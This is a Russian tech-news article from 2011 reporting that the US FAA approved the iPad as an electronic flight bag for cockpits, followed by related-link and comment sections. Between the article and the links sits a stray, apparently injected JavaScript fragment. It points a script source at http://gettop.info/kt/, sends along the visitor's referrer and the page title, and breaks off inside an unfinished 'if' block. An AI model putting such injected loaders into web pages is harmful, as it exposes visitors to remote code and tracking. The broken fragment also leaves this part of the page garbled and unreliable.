iPad в качестве электронного планшета с полетной документацией

05.07.2011, Новости, Кирилл Месяц

Kelly Caglia — первый сотрудник с iPad в Боинге 777. Фото — New York Times

Федеральное управление гражданской авиации США сертифицировало iPad от Apple для использования в пилотных кабинах. Пилоты не будут играть в известную Angry Birds: данное решение позволит заменить около сорока фунтов макулатуры на электронный планшет с множеством замечательных приложений. Печатные пособия, памятки безопасности, журналы, навигационные карты, информация о погоде, планы аэропортов — благодаря iPad со специальными приложениями все эти документы устареют, что сделает кабину пилотов поистине безбумажной. Как сообщает New York Times:

«Федеральное управление гражданской авиации уполномочило нескольких коммерческих и чартерных перевозчиков использовать планшетный компьютер в качестве так называемых электронных планшетов с полетной документацией. Частные перевозчики в настоящее время также используют iPad’ы, для которых существуют сотни общих авиационных приложений, упрощающих предполетную подготовку и оказывающих помощь во время полетов».

iPad был одобрен как отдельное устройство, которое не связано с остальной электроникой самолета. Но как же быть с работой планшетника от аккумулятора? iPad может работать до 10 часов без подзарядки, поэтому пилоты могут использовать его во время длительных перелетов без необходимости подключения к розетке в салоне самолета. Стив Джобс как- будто предвидел это. Он отметил во время презентации iPad 27 января прошлого года, что инженерам Apple удалось достичь десяти часов автономной работы, и это значит, что «я могу смотреть видео на протяжении всего рейса из Сан-Франциско до Токио». Если этого достаточно для морской пехоты США и  контрактников Сингапура, то будет востребовано и для коммерческих авиалайнеров.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

if (document.currentScript) {

Читайте также:

  1. Smart Cover… для iPad(!)
  2. Новые жесты для iPad всего за $5
  3. Большая распродажа игр для iPad
  4. iPad под силу даже ребенку
  5. Продажи iPad сделают Apple к 2012 году крупнейшим поставщиком мобильных PC

Оставить комментарий

Обязательно.

Обязательно. Не публикуется.